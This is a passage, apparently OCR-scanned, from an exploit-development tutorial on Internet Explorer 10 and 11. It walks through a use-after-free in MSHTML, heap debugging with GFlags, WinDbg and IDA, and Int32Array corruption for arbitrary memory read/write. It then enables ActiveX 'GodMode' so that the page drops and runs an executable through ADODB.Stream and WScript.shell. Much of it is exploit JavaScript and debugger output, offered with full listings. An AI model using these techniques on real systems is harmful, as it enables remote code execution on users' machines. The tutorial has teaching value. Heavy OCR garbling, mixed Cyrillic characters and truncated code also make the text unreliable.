а, -—— — ———— Lfirst argument 
ebp+Str2], eax 


short loc_1iDfB9E1A 





ІШ га 227 


Loc_1D7B9E1A: 
хок ebx, 





ебх, (6514-0011 
short loc 1iD7zB9E1C 















ebx 





laii] са 55 


јос_10789ЕЧС - ; this 
lea ecx, [esis58n] 

call ?GetCritsSec@tserializeddbject@@QnEPAPAVCCriticalsSection@@xz : CSerializedObject: -GetCritsSectvoid) 
lea ecx, [ebp+tvar_948] ; this 

mou edi, eax 

mou [ебр+чан 938], ебх 

call ?"InitiaccontextiewagnExasz2z : CContext::init¢void) 

cmp byte 1D7Db215h^, В 
jz short loc 1D7B9E5G0 































edi 
call 85: imp UMSEnterCSWraper 
esp, 4 

[ebp*var 925], edi 


















loc_1D7B9E56: 
mou edi, [ebp*dwCreationDisposition] 


xor Pax, гах 

test byte ptr  bidGblFlags, 4 
mov [ебр+чан 9181, eax 

тау [ebptbstrString], eax 


mou [ebpruar 91С|, BFFFFFFFEnh 
short loc i1D7B9En2 




























еск, ds:1D7DA^^EüUn 
есх, есх 
short loc 1D7B9EAn2 








mou eax, [esi«5hh] 


mou ебх, [ebp*Str?2] loc 1D7B9ER?- 

mou edx, ds:1D7D^^4EBh mau ебх, [ebp*str2] 
push edi 

push ebx 

push eax 

push edx 

леа eax, [ebp+var_91C] 

push Pax 

call _ bidScopeEnterw 

add esp, 14h 





short loc 1D7B9ERS8 





loc 1D7B9ER8: 
test ebx, ebx 
jz short loc_1D7B9EB? 


ebx ; BSTR 

ds: imp SysStringlen@4 ; SysStringLen(x) 
eax, eax 

short loc 1D7B9F23 




















ТІРЕ 


loc 1D7B9F23: 
стр edi, 1 
1 short loc 1D7B9F98 








edi, 2 
short loc 1D7B9F9S8 





loc 1D7ZB9F98: 


dword ptr [esi+58h], ө 
loc 10787009 





loc_1D7BAG69: 
eax, [esi-ó8h] 
al, 1 
short loc 1D7BRhn888 








2 
short loc 1D7Bhn888 






loc_1D/BA886- 


тоу есх, [esi«38h] 

lea edx, Геврғуиағ- 914] 
push едх 

Теа eax, [esi-«38n] 

push offset _ 110 IUnknoun 
push eax 

mou eax, [ecx+16h] 

call eax 

test byte ptr [esi-^8h], 3 


jz short loc _1D7BAGA4 











ашаға ptr [esi-hhh], 8 
short loc_1D?7BAGDA 





loc 1D7BAGA4: 
es рах, еа 
jz loc 1D7Bf1h5 



















unsigned  1ПЕ16 ж 
unsigned inti ж 
SecurityCheck@@vAJPBGPAG@Z ; SecurityCheck¢ushort const *,ushort ж) 
esp. 8 

eax, Pax 

loc 1D7Bf1h5 









? 





It's quite clear that is indeed the pointer . This is good because the variable in our javascript 
probably points to the same object. Let's find out if we're right. To do so, let's leak by modifying our 
javascript code as follows: 


JavaScript 


function createExe(fname, data) { 
GodModeOn(); 
tStream = ActiveXObject("'ADODB.Stream"); 
bStream - ActiveXObject("ADODB.Stream"); 
GodModeOff(); 


tStream.Type - 2; 
bStream.Type = 1; 
tStream.Open(); 


bStream.Open(); 
tStream.WriteText(data); 
tStream.Position = 2; 
tStream.CopyTo(bStream); 

alert(get addr(bStream).toString(16)); 
bStream.SaveToFile(fname, 2); 
tStream.Close(); 

bStream.Close(); 





Load the page in IE using SimpleServer and in WinDbg put a breakpoint on 


bm msado15!CStream::SaveToFile 


The alert box will pop up with the address of . In my case, the address is . After we close 
the alert box, the breakpoint is triggered. The address of the is , which in my case is 
. Let’s examine the memory at the address (our ): 


0:007> dd 3663f40h 

03663140 71bb34c8 0e069a00 00000000 0e5db030 
03663150 05a30f50 03663114 032fafd4 00000000 
03663f60 71c69a44 00000008 00000009 00000000 
03663f70 Oe8cb248 00000000 00000000 00000000 


03663180 71с69а44 00000008 00000009 00000000 
03663190 Oe8cb328 00000000 00000000 00000000 ptr to CStream! 
03663fa0 71c69a44 00000008 00000009 00000000 
03663100 Oe8cb248 00000000 00000000 00000000 
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We can see that at offset 0x50 we have the pointer to the object CStream whose SaveToFile method is 
called in msado15.dll. Let's see if we can reach the string http://127.0.0.1, which is the one we'd like to 
modify: 


0:007» 2 poi(3663f40+50) 
Evaluate expression: 244101928 = 0e8cb328 


0:007» du ро(Оеёср328-44) 
04е5#14 "http://127.0.0.1/" 





Perfect! 

Now we must determine the exact bytes we want to overwrite the original string with. Here's an easy way of 
doing that: 

0:007> ezu 04e5ff14 "C:\\" 

0:007> dd 04e5ff14 

04е5#14 003a0043 0000005с 002f003a 0031002f 
04е5#24 00370032 0030002e 0030002e 0031002e 
04е5#34 00000021 00000000 00000000 58е7Ь7ЬЫ9 
04е5#44 8е000000 00000000 bf26faff 001а8001 
04е5#54 00784700 00440041 00440041 002е0042 
04е5#64 00740053 00650072 00640061 а6с0000 
04е5#74 00000274 58e7b7be 8с000000 00000000 
04е5#84 00сба95а 001с8001 00784300 00530057 





So we need to overwrite the string with 003а0043 0000005с. 
Change {Пе code as follows: 


JavaScript 


("ADODB.Stream"); 
("ADODB.Stream"); 
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Ё т); 

= геад (геад (! iddr + 0х50) + Ox44); 
‚ 0х003а0043); 

+ 4, 0х0000005с); / 


Load the page in IE and, finally, everything should work fine! 
Here's the complete code for your convenience: 


XHTML 


or (i = ШІ 01300 ++i) | 
1 (0х3с00), 
00) 


= ой 
=ne 

“| « a[i]. h; ++j) 
] = 0x123; 


“alll =n 
if (i= 
for ( 
ШІ 


(0х58); 
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for ( i < 0x300 + 0x400; ++i) { 
ali) = new rray(Ox3bf8) 

for (j = 0; | < 0x55; a 
illj] = new Int32Array(buf) 


ray = 0; 
for r (i = 0x300; i < 0x300 + 0x400; ++i) { 
or (j = 0; j < 0x55; ++j) { 
if (ај лепаћ != 0х58/4) ( 
nt32ar 107; 


[0x60/4], 
[0x60*2/4], 
Yy[0x60*3/4], 
[(0х60+0х24)/4], 
1у[(0х60*2+0х24)/4], 
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tr3 = іпіЗ2аггау[(0х60*3+0х24)/4]; 
r1 & Oxffff |= 0х6е18 || vftptr1 != 
tr2 - nextPtr1 != 0x60 || n 


(0; 


ІРіг1 - 0х60*2; 


[(Ox0cOaf000+0x1c - buf. addry/4] != bu 


(0; 


ray[(OxOcOaf000+0x18 - buf addr)/4] = 0x20000000; 
"array[(0x0cOaf000-0x1c - I iddr)/4] = 0; 
1 read(ad ){ 
Idi & 3; 


-k)/4] >> k*8) | 
-k+4)/4] << (32 - k*8)); 


ray -k)/4]; 
kaa 0 


= int yi 
= (= kea 


у & mask) | (value << k*8); 

jh & (Oxffffffff - mask)) | (valu 
-k)/4] = low; 
-k+4)/4] = 
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jscript9 = read(0xOcOaf000) - 0х3Ь60; 


for (i = 0x200; i < 0х200 + 0x400; ++i) 
a[i][Dx3bf7] = 0; 


write(OxOcOaf000-4, 3); 
leakArray - 0; 
for (i = 0x200; i « 0x200 + 0x400; ++i) { 
if (a[i][Dx3bf7] != 0) { 
leakArray = ali]; 
break; 


} 


} 

if (leakArray == 0) { 
alert("Can't find leakArray!"); 
window. location.reload(); 
return; 


} 


function get addr(obj) { 
leakArray[Ox3bf7] = obj; 
return read(OxOcOaf000-4, obj); 
) 


маг аддг = get addr(document.createElement("div")); 
mshtml = read(addr + 0x10) - 0x58b9a; 
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tml+0xc555e0+0x14); 


nshtml+0xc555e0+0x14, јѕсгірі9+0хас164); 
=new ("WScript.shell"); 


| +0хс555е0+0х14, 


Л 
+ 0x28) + 4) + 0х10: 


bj); 
bjptr); 


(0x708/4); 
length; ++i) 
tr + 14); 
+0x10705e; 
%0хас164; 


(4); 


+ 0х151800; 
9 + Oxf3baf; 
+ Охас361; 
L addr( 


http: 
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); 
iddr + 0x50) + 0x44); 


IL = 1 ( 1 ( | 
, 0х003а0043); 

+ 4, 0x0000005c); 
( 22)! 


As before, | snipped . You can download the ІШІ code from here: code3. 
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Until now, we have depended on for modifying the length of an to acquire full read/write 


access to the space address of the IE process. It's high time we found a to complete our 

| chose the UAF with code . You can google for it if you want additional information. Here's 
the to produce the 

XHTML 


«html» 
«head» 
</head> 
<body> 
<script> 
handler() { 
this.outerHTML = this.outerHT ML; 


} 


trigger() { 
га = document.getElementsByTagName("script")[0]; 
a.onpropertychange = handler; 
b = document.createElement("div"); 
b = a.appendChild(b); 





Copy and paste that code in an HTML file and open it in IE 10. If you do this, you'll discover that IE doesn't 
crash. What's wrong? 


GFlags 


In the same directory as , ме can find , a utility which can be used to change the 
of Windows. These flags influence the behavior of Windows and can be immensely helpful during 
debugging. We're especially interested in two flags: 


1. — Heap Page Allocator 
2. — User mode Stack Trace 


The flag HPA tells Windows to use a special version of the heap allocator that's useful to detect UAF, buffer 
overflows and other kinds of bugs. It works by allocating each block in a separate set of contiguous pages 

(how папу depends оп the length of the block) зо {Па the end of the block coincides with the end of the last 
page. The first page after the allocated block is marked as not present. This way, buffer overflows are easily 
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and efficiently detectable. Moreover, when a block is deallocated, all the pages containing it are marked as 
not present. This makes UAF easy to detect. 


Look at the following picture: 


not 
present 


—_.——— 


allocated block 





A page is 0x1000 bytes = 4 KB. If the allocated block is less than 4 KB, its size can be easily determined 
from its address with this simple formula: 


size(addr) = 0x1000 - (addr & Oxfff) 


This formula works because the block is allocated at the end of the page containing it. Have a look at the 
following picture: 


0x19000 0x19b50  0x1a000 


block size = 0x1a000 - 0x19b50 = 0x4b0 
0x1000 - (0x19b50 & Oxfff) 
= 0x1000 - 0хЬ50 = 0x4b0 





The second flag, UST, tells Windows to save a stack trace of the current stack whenever a heap block is 
allocated or deallocated. This is useful to see which function and path of execution led to a particular 
allocation or deallocation. We'll see an example during the analysis of the UAF bug. 


Global flags can be changed either globally or on a per image file basis. We're interested in enabling the 
flags HPA and UST just for iexplore.exe so we’re going to choose the latter. 
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Run , go to the tab , insert the image name and select the two flags as illustrated in the 
following picture: 


Global Flags 


System Registry | Kernel Flags | Image File | Silent Process Exit | 
Image: (TAB to refresh) [iexplore.exe] Launch 


[ Stop on exception [ Disable stack extension 
[ Show loader snaps 


[ Enable heap tail checking | Enable system critical breaks 
| Enable heap free checking [ Disable heap coalesce on free 


| Enable heap parameter checking 
| Enable heap validation on са! | | flag | Enable exception logging 


| Enable application verifier HPA flag 
Jv Enable page heap a7 


|v iCreate user mode stack trace database: [ Early critical section event creation 


| Stop on user mode exception 


Г Enable heap tagging by DLL [ Disable protected DLL verification 
[ Ignore asserts 

Г Load image using large pages if possible 

[ Debugger: 


Г Stack Backtrace: (Megs) 


OK | Сапсе! Apply 





Getting the crash 


Now load the POC in IE and you should get a crash. If we do the same while debugging IE іп WinDbg, we'll 
see which instruction generates the exception: 


6b900fc4 e83669e6f call MSHTML!CTreePos::Sourcelndex (6676781) 
6b900fc9 8d45a8 lea eax,[ebp-58h] 


(7071010162210 push еах 
65900Гса 8Бсе mov eCx, esi 
6b900fcf с745а804000000 том dword ptr (ерр-58һ|,4 
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6b900fd6 с745с400000000 тоу "Тој e ptr (ebp-3Ch),0 

65900144 с745ас00000000 тоу амога ри (ebp-54h),0 

6р900Ге4 с7452028000000 том dword ptr [ебр-40ћ],28ћ 

6b900feb c745b400000000 тоу dword ptr (ebp-4Ch),0 

6b900ff2 c745b000000000 тоу  dword ри [ебр-501],0 

6b900ff9 c745b8ffffffff mov — dword ptr [ebp-48h],OFFFFFFFFh 

6b901000 c745bcffffffff mov dword ptr [ebp-44h],OFFFFFFFFh 

60901007 e80162e6ff сай MSHTML!CMarkup::Notify (6b76720d) 

6b90100c #4678 inc 

60901001 838e6001000004 or «мүога ptr [esi+160h],4 

6b901016 8bd6 mov edx,esi 

66901018 e8640b0600 call MSHTML!CMarkup::UpdateMarkupContentsVersion (65961681) 
6b90101d 8b8698000000 том eax,dword ptr [esi+98h] 

66901023 85c0 test eax,eax 

66901025 7416 je © MSHTML!CMarkup::NotifyElementEnterTree+0x297 (6690103а) 
6b901027 81bea4010000905f0100 cmp dword ptr [esi+1A4h],15F90h 

6b901031 7с0а j | MSHTML!CMarkup::NotifyElementEnterTree+0x297 (6b90103d) 
66901033 8b4008 mov  eax,dword ptr [еах+8] 

6b901036 83a0f0020000bf апа dword ptr [eax+2FOh],OFFFFFFBFh 

6b90103d 8d7dd8 lea edi, [ebp-28h] 





It looks like ESI is a dangling pointer. 


Here's the stack trace: 


0:007» k 10 

ChildEBP RetAddr 

0a10b988 6b90177b MSHTML!CMarkup::NotifyElementEnterT ree+0x266 
0a10b9cc 6b9015ef MSHTML!CMarkup::InsertSingleElement+0x169 

0a10baac 6b901334 MSHTML!CMarkup::InsertElementinternalNoInclusions+0x11d 


0a10bad0 6b9012f6 MSHTML!CMarkup::InsertElementInternal+0x2e 
0a10bb10 66901393 MSHTML!CDoc::InsertElement+0x9c 
0a10bbd8 6b7d0420 MSHTML!InsertDOMNodeHelper-*0x454 
0a10bc50 6b7d011c MSHTML!CElement::InsertBeforeHelper+0x2a8 
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0a10bcb4 6b7d083c MSHTML!CElement::InsertBeforeHelper+Oxe4 

0a10bcd4 6b7d2de4 MSHTML!CElement::InsertBefore+0x36 

0а106а60 66792901 MSHTML!CElement::Var_appendChild+0xc7 

0a10bd90 0с17847а MSHTML!CFastDOM::CNode::Trampoline_appendChild+0x55 
0a10bdf8 0c176865 jscript9! Js::JavascriptExternalFunction::ExternalFunctionT hunk+0x185 


0a10bf94 0c175cf5 jscript9!Js::InterpreterStackFrame::Process+0x9d4 

0a10c0b4 09ee0fe1 jscript9! Js::InterpreterStackFrame::InterpreterThunk«12-0x305 
WARNING: Frame IP not in any known module. Following frames may be wrong. 
Оа10с0с0 0c1764ff Ox9eeO0fe1 

0а10с254 0c175cf5 jscript9!Js::InterpreterStackFrame::Process+0x1b57 





Let’s determine the size of the (now freed) object: 


0:007> ? 1000 - (@esi & fff) 
Evaluate expression: 832 = 00000340 





Of course, we're assuming that the object size is less than 0x1000. Finally, here's an example of stack trace 
available thanks to the UST flag: 


0:007» !heap -p -a (esi 

address 0e12dcc0 found in 

 DPH HEAP ROOT @ 141000 

іп free-ed allocation ( ОРН_НЕАР_ВГОСК: VirtAddr Мігібіге) 
e2d0b94: e12d000 2000 

73399062 мепћепАмпребидРадеНеарРгее+0х000000с2 

77261564 ntdil!RtIDebugFreeHeap+0x0000002f 

7726ac29 ntdll!RtlpFreeHeap+0x0000005d 

772134а2 ntdll!RtIFreeHeap+0x00000142 

741414аа kernel32! HeapFree+0x00000014 

6b778f06 MSHTML!CMarkup:: vector deleting destructor'+0x00000026 

6b7455da MSHTML!CBase::SubRelease+0x0000002e 

6b774183 MSHTML!CMarkup::Release+0x0000002d 

6bb414d1 MSHTML!InjectHtmlStream-*0x000007 16 

6bb41567 MSHTML!HandleHTML Injection+0x00000082 

6bb3cfec MSHTML!CElement::InjectInternal+0x00000506 
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6bb3d21d MSHTML!CElement::InjectTextOrHTML--0x000001a4 

6ba2ea80 MSHTML!CElement::put_outerHTML+0x0000001d 

6bd3309c MSHTML!CFastDOM::CHTMLElement::Trampoline_Set_outerHTML+0x00000054 < 
0c17847a jscript9! Js::JavascriptExternalFunction::ExternalFunctionThunk+0x00000185 


0c1792c5 jscript9! Js::JavascriptArray::GetSetter+0x000000cf 


0с146с56 јаспр19д!Ј5: | пегргегегатаскЕгате::ОР_РгоПеа5зе Ргорепу<0,Ј5::Ор ауошЕ ететСР_ОпеВује>+0х000005 
a8 


O0c1ac53b jscript9! Js: :InterpreterStackFrame::Process+0Ox00000fbf 
0c175cf5 jscript9! Js::InterpreterStackFrame::InterpreterT hunk<1>+0x00000305 





This proves that ES! is indeed a dangling pointer. The names of the functions suggest that the object is 
deallocated while executing the assignment 


this.outerHTML = this.outerHTML; 


inside the function handler. This means that ме should allocate the new object to replace the old опе іп 
memory right after that assignment. We already saw how UAF bugs can be exploited in the 
chapter exploitme5 (Heap spraying & UAF) so | won't repeat the theory here. 


What we need is to allocate an object of the same size of the deallocated object. This way, the new object 
will be allocated іп the same portion of memory which the deallocated object occupied. We know {Па the 
object is 0x340 bytes, so we can create a null-terminated Unicode string of 0x340/2 — 1 = Ox19f = 415 
wchars. 


First of all, let's pinpoint the exact point of crash: 


0:007> !address @eip 


Марріпо file section regions... 
Mapping module regions... 
Mapping PEB regions... 

Mapping TEB and stack regions... 


Mapping heap regions... 


Mapping page heap regions... 
Mapping other regions... 
Mapping stack trace database regions... 


Mapping activation context regions... 
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Usage: Image 

Base Address: 6c4a1000 

End Address: 6d0ef000 

Region Size: 00c4e000 

State: 00001000 MEM COMMIT 

Protect: 00000020 PAGE EKECUTE READ 
Type: 01000000 MEM IMAGE 

Allocation Base: 6c4a0000 

Allocation Protect: 00000080 PAGE EKECUTE WRITECOPY 
Image Path: C:\Windows\system32\MSHTML.dll 
Module Name: MSHTML 

Loaded Image Name: _C:\Windows\system32\MSHTML.dll 
Марреа Image Мате: 

More info: Іту m MSHTML 

More info: "imi MSHTML 

More info: In 0х6с6с100с 

More info: [e| 0хбс4а0000 


0:007> 2 @eip-mshtml 
Evaluate expression: 2232332 = 0022100c 





So the exception is generated at mshtm! + 0x22100c. Now close WinDbg and IE, run them again, open the 
POC in IE and put a breakpoint on the crashing point in WinDbg: 


бр mshtml + 0x22100c 


Now allow the blocked content іп IE апа the breakpoint should be triggered right before the exception is 
generated. This was easy. This is not always the case. Sometimes the same piece of code is executed 
hundreds of times before the exception is generated. 


Now we can try to allocate a new object of the right size. Let's change the POC as follows: 
XHTML 
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«html» 
«head» 
</head> 
<body> 
<script> 
handler() { 
this.outerHTML = this.outerHTML; 
elem = document.createElement("div"); 
elem.className = new Array(416).join("a"); 


} 


trigger() { 
a = document.getElementsByTagName("script")[0]; 
a.onpropertychange = handler; 
b = document.createElement("div"); 
b = a.appendChild(b); 





“ “| 


Note the nice trick to create a string with 


Before opening the POC in IE, we need to disable the flags HPA and UST (UST is not a problem, but let's 
disable it anyway): 
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Global Flags 


System Registry | Kernel Flags Silent Process Exit | 
Image: (TAB to refresh) | ехроге exe | Launch 


| Stop on exception | Disable stack extension 


| Show loader snaps 


| Enable heap tail checking | Enable system critical breaks 
| Enable heap free checking [ Disable heap coalesce on free 
| Enable heap parameter checking 

| Enable heap validation on call | Enable exception logging 


[ Enable application verifier 


[ Enable page heap 


[ Enable 
reate user mode stack trace database [ Early critical Section event creation 
| Stop on user mote exception 


| Enable heap tagging by DL [ Disable protected DLL Y 
Го 
| Load image using large pages if possible If you entered the correct 
| Debugger: | image name, these two flags 
[ Stack Backtrace: (Megs) | were enabled. Now disable 
them as shown here! 





Now let's reopen the POC in IE, put a breakpoint at and let's see what happens: 
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ТЕ! Pid 5728 - WinDbg:6.3.9600.16384 X86 
дом Help 
voto | EJ ЕЈ Ome CT TEES] Ал ГЕН 


Virtual: 


bp-4 
bp-44h] 


mp dword ptr 
rkup 

d pt 

> Те 


0:007»| 





іп 0, Со10 SysO:«Local» Proc 0X 60 Thrd 007:168c А 


Wonderful! points to our object ( is the code point for the character ʻa‘) and now we can take control 
of the execution flow. Our goal is to reach and control an instruction so that it writes at the address 
. You should know this address by heart by now! 


You might be wondering why we assign a string to the property of a . Note that we 
don't just write 


var str = new Array(416).join("a"); 





When we assign the string to , the string is copied and the copy is assigned to the property 
of the DOM element. It turns out that the copy of the string is allocated on the same heap where the object 
which was freed due to the UAF bug resided. If you try to allocate, for instance, an of 

bytes, it won’t work, because the raw buffer for the will be allocated on another heap. 


Controlling the execution flow 
The next step is to see if we can reach a suitable instruction to write to memory at an arbitrary address 


starting from the crash point. Once again, we'll use . | can't stress enough how useful IDA is. 
We determined the address of the crash point to be . This means that we need to 
disassemble the library . Let’s find the path: 
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0:016» Imf m mshtml 


start end module name 
брбеоооо 62491000 MSHTML C:\Windows\system32\MSHTML.dll 





Now let's open that in IDA and, when asked, allow IDA to load symbols from the Microsoft server. Let's 
go to — > . From there we can determine the base address of 


=] IDA View-A Program Segmentation EJ Hex View-1 A Structures Enums i Imports => Exports 


> 
о 


es 55 ds fs gs 

FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF 
0000 0000 0002 FFFFFFFF FFFFFFFF 
0000 0000 0002 FFFFFFFF FFFFFFFF 
0000 0000 0002 FFFFFFFF FFFFFFFF 
0000 0000 0002 FFFFFFFF FFFFFFFF 
0000 0000 0002 FFFFFFFF FFFFFFFF 


Name г Епа \ › ) Align Base Type Class 
HEADER 3 63581000 ін Т) ІШ раде 0005 public DATA 
ext 635 641CF000 á з рага 0001 public CODE 
Чата 641CF000 641CF9EC \ ЭЭ рага 0002 public DATA 
„дата 641CF9EC 641F1000 и рага 0002 public DATA 

DATA 


data 641F1000 641F1E14 i SEP" para 0003 public 
tls base adress 641F7000 641F8000 м. рага 0004 public BSS 


мо UJ 


mej me] me] [e] ЕЗ зе 
UJ UJ w 
кмм 


из 





As we can see, the base address is . Now close the tab, press g and 
enter . You should find yourself at the crash location. 


Let’s start with the analysis: 


We need to look 
into this call 
(we control the data 
pointed to by EDX) 


Let's choose 
[esi*1a4h] = 11111h 


so that the block 
below is skipped 


; CUndoHelper::CreatefndSubmit(bonl) 
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The value of [esi- 98h] must бе поп 0 because our string can't contain null wchars (they would terminate the 
string prematurely, being the string null-terminated). Because of this, the execution reaches the second 
node where [esi 1a4h] is compared with 15f90h. We can choose [esi* 1a4h] = 11111h so that the third node 
is skipped and a crash is easily avoided, but we could also set up things so that [eax+2fOh] is writable. 


Now let's look at the function ?UpdateMarkupContentsVersion: 
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We choose 
[edx*Oach] = OxcOafO0b 
sothe inc instruction in | 

the second block 


increments the highest 
byte (at OxcOaf01b) 

of the length field of the 
chosen Int32Array 









ПсПаЕППП 69+73Ъ60 ü3e38d4U 00000000 0000000 
ücDafüi0 00000004 00000000 [00000156 0367370 


dword at 
OxcOaf01b. 










EDX points to the 
object we control 


га) |221 









We choose 
[edx+94h] = OxcOaf010 
50 
eax =|Int32Array.buf_addr]} 












OcOafO00 64373560 03е38440 00000000 0 3 
OcOafO10 00000004 00000000 00000016 [033737&0] 











If the raw buffer is at 
33797e0h, 
then we must have 


[33797e0h- 1cOh] = 0 
This way, we go straight | 
to the end of the function. 








nou eax, [ecx+6Ch] 









loc 63881BBB:- 
eax, [eax*1C8h] 
byte ptr [eax-8Ch], 1 
loc 63961871 





eax, [eax*^Ch] 
Pax, [eax*38h] 








eax, ёах 


loc 63881BD1 
END OF FUNCTION CHUNK FOR ?UpdateHarkupContentsUersionlacHarkuptagaE xx2 











MEE 


; START OF FUNCTION CHUNK FOR ?UpdateHarkupContentsUersion(ChHarkup(xaQQEXXxz 





loc_637A13C9: 
test есх, есх 
12 locret 63801809 


mou ecx, [ecx+@Ch] 
test есх, есх 
јг locret 63801809 









esi 
esi, [ecx*8C58h] 


eax, [esi] 
edi 

edi, 4008h 
edi, eax 

loc 63961830 


The picture should бе clear enough. Anyway, there's an important point to understand. We know that ће 

whose length we want to modify is at address , but we don't control the values at that 
address. We know, however, that the value at is the address of the raw buffer associated with the 

. Note that we don't know the address of the raw buffer, but we know that we can find that 
address а! . Now we must make sure that ће dword at offset in the raw buffer is 
Unfortunately, the raw buffer is only bytes. Remember that we can’t allocate a bigger raw buffer 
because it must have the exact same size of a . But there is an easy solution: allocate more 
raw buffers! 


Let’s summarize our memory layout: 


Object size - 0x340 - 832 


offset: value 
94h: OcOaf010h 
(X = [obj addr*94h] = OcOaf010h ==> У = [X+0ch] = raw. buf addr ==> [Y+1cOh] is 0) 


Oach: OcOafOObh 

(X = [obj_addr+Oach] = OcOaf0Obh ==> тс dword ptr [X+10h] ==> inc dword ptr [OcOaf01bh]) 
1a4h: 11111h 

(X = [obj addr*1a4h] = 11111h < 15f90h) 





We need to make several changes to our html file. 
First, ме add the code for triggering the UAF bug апа taking control of the execution flow: 


JavaScript 


| getFiller(n) { 
new Array(n+1).join("a"); 


ІП | getDwordStr(val) ( 
return String.fromCharCode(val 96 0x10000, val / 0x10000); 


iction handler() | 
1is.outerHTML = this.outerHTML; 


elem = document.createElement("div"); 
elem.className = getFiller(0x94/2) + getDwordStr(OxcOaf0 10) + 
getFiller((Oxac - (0x94 + 4))/2) + getDwordStr(OxcOaf00b) + 
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((0х1а4 - (Охас + 4))/2) + getDwordStr(0x11111) + 
((0x340 - (0х1а4 + 4))/2 - 1); 2 


Next, we must create 4 more , as we've already discussed: 


JavaScript 


0; i < Ox300; ++i) { 
new (0x3c00); 


alil] = 0x123; 
) 


Having added 4 more , we also need to fix the code which computes the address of the first raw 
buffer: 


JavaScript 
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ray[0x60*5/4], 

[0x60*6/4], 

[0x60*7/4], 
2array[(0x60*5+0x24)/4], 
[(Ox60*6+0x24)/4], 
nextPtr3 = іпіЗ2аггау[(0х60*7+0х24)/4]; 
btr1 & Oxffff != 0х6е18 || vftptr1 != vfi 
Ptr2 - 1 r1 |= 0x60 || nextPtr3 - 


id(); 


1 - 0x60*6; 


Basically, we changed into to account for the additional 4 raw 
buffers after the original raw buffer. Also, the last line was 


buf addr = nextPtr1 - 0x60*2 


and has been changed to 


buf addr = nextPtr1 - 0x60*(2+4) 


for the same reason. 
| noticed that sometimes fails, so | decided to force the page to reload when this happens: 


JavaScript 
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); 

Ir=r (read(bStream_addr + 0x50) + 0x44); 
, 0x003a0043); ) 
ir + 4, 0х0000005с); //'\' 


pz 


Here’s the full code: 


JavaScript 


al % 0x10000, val / 0x10000); 
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]ement("div"); 
(0x94/2) * get (0xcOaf010) + 
((Охас - (0x94 + 4))/2) + get JStr(0xcOafO00b) + 
((Ox1a4 - (Oxac + 4))/2) + getDwordStr(0x11111) + 
((0x340 - (0x1a4 + 4))/2 - 1); | 


("script")[0]; 


for (i = 0; i < 0x300; ++i) { 
ем Array(0x3c00); 


for (j = 0; | < 


[i]. 
ІШІ = 0x123; 
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for (; i < 0x300 + 0x400; ++i) ( 
ali] = new Array(Ox3bf8) 
for (| = 0; | < 0x55; ++)) 
a[i]j] = new Int32Array(buf) 


for (var k = 0; k « 0x20; ++k) 
trigger(); 


int32array - 0; 
for (i = 0х300; i < 0x300 + 0x400; ++i) { 
for (| = 0; | < 0x55; ++]) { 
if (a[i][j].lFength != 0x58/4) { 
int32array = a[i][j]; 
break; 


) 


) 
if (int32array != 0) 
break; 


) 
if (int32array == 0) { 


window.location.reload(); 
return; 


) 
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(32аггау(0х6075/41, 
2array[0x60*6/4], 
[0x60*7/4], 
[00х60*5+0х24)/4], 
›аггау[(0х60*6+0х24)/4], 
3 = [(Ox60*7+0x24)/4]; 
r1 & Ох != Охбе18 || vftptr1 != vftptr2 
r2 - nextPtr1 != 0x60 || nextPtr3 - n 


(0; 


- 0х60"6; 
if (int32array[(OxOcOaf000+0x1c - buf 
id(); 


ay[(0xOcOaf000-0x18 - buf addr)/4] = 0x20000000; 
ггау|(0хОсОа!000-0х1с - buf addr)/4] = 0; 
›п read(address) ( 
Idi & 3; 


-k)/4] >> k*8) | 
-k+4)/4] << (32 - k*8)); 


"to debug"); 


[(address-k)/4]; 
| = int32array[(address-k+4)/4]; 
= (1 << k*8) - 1; / Oxff or Ох 
<< К*8); 
е >> (32 - k*8)); 
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jscript9 = read(0xOcOaf000) - 0х3660; 


for (i = 0x200; i < 0x200 + 0х400; ++i) 
a[i]OX3bf7] = 0; 


write(OxOcOaf000-4, 3); 
leakArray = 0; 
for (i = 0x200; i < 0x200 + 0x400; ++i) | 
if (a[i][Dx3bf7] != 0) ( 
leakArray = ali), 
break; 


) 


) 
if (leakArray == 0) { 


window.location.reload(); 
return; 


) 


function get addr(obj) { 
leakArray[Ox3bf7] = obj; 
return read(0xO0cOaf000-4, obj); 


) 


маг аддг = get. addr(document.createElement("div")); 
mshtml = read(addr + 0x10) - 0x58b9a; 
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(mshtml+0xc555e0+0x14); 
itml+0xc555e0+0x14, јѕсгірі9+0хас164); 
ne Ор V t.shell"); 


ew ACUVeA ( VV 
iml+0xc555e0+0x14, old); 


сі); 

0x28) + 4) + 0х1Ю; 
bj); 
bjptr); 


(0х708/4), 
length; ++i) 
tr +4); 
+0x10705e; 
+0хас164; 


( 


= ге; IC 


(4); 


+ 0х151800: 

+ Oxf3baf; 

+ 0xdc361; 
t addr(n 


http: 
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| | | Л 
ir = ( (051 Ir + 0x50) + 0x44); 
, 0х003а0043); 
+ 4, 0х0000005с); 


File(fname, 2); 
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Аз always, | snipped гипсајс. You сап download the full code Кот here: code4. 


Load the page in IE using SimpleServer and everything should work just fine! This exploit is very reliable. In 
fact, even when IE crashes because something went wrong with the UAF bug, IE will reload the page. The 
user will see the crash but that's not too serious. Anyway, the event of a crash is reasonably rare. 


Internet Explorer 10 32-bit and 64-bit 


There are two versions of IE 10 installed: the 32-bit and the 64-bit version. Our exploit works with both of 
them because while the iexplore.exe module associated with the main window is different (one is a 32-bit 
and the other a 64-bit executable), the iexplore.exe module associated with the tabs is the same 32-bit 
executable in both cases. You can verify this just by looking at the path of the two executable in the 
Windows Task Manager. 
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IE11: Part 1 


For this exploit I’m using a VirtualBox VM with Windows 7 64-bit SP1 and the version of Internet Explorer 11 
downloaded from here: 


http://filehippo.com/download_internet_explorer_windows_7_64/tech/ 


EmulatelE9 


Finding a UAF bug for |Е 11 for this chapter was very hard because security researchers tend to omit 
important technical details in their articles. As a student of exploit development | wish | had access to such 
information. 


Anyway, the UAF bug | found needs the following line: 
XHTML 





neta http-equiv="X-UA-Compatible" content="IE=EmulatelE9" 


Unfortunately, when we're emulating IE 9, Int32Arrays are not available, so the method we used for IE 10 
(see article), although pretty general, is not applicable here. It’s time to look for another method! 


Array 


We saw how Arrays are laid out in memory in IE 10. Things are very similar in IE 11, but there’s an 
interesting difference. Let’s create an Array with the following simple code: 


XHTML 


1! 


t 
000 - 0x20)/4); 





We saw that in IE 10 Arrays were created by calling jscript9!Js::JavascriptArray::Newlnstance. Let's put a 
breakpoint on it: 





bp jscript9!Js::JavascriptArray::NewInstance 


If we reload the page in IE 11 nothing happens. Let's try with the constructor: 
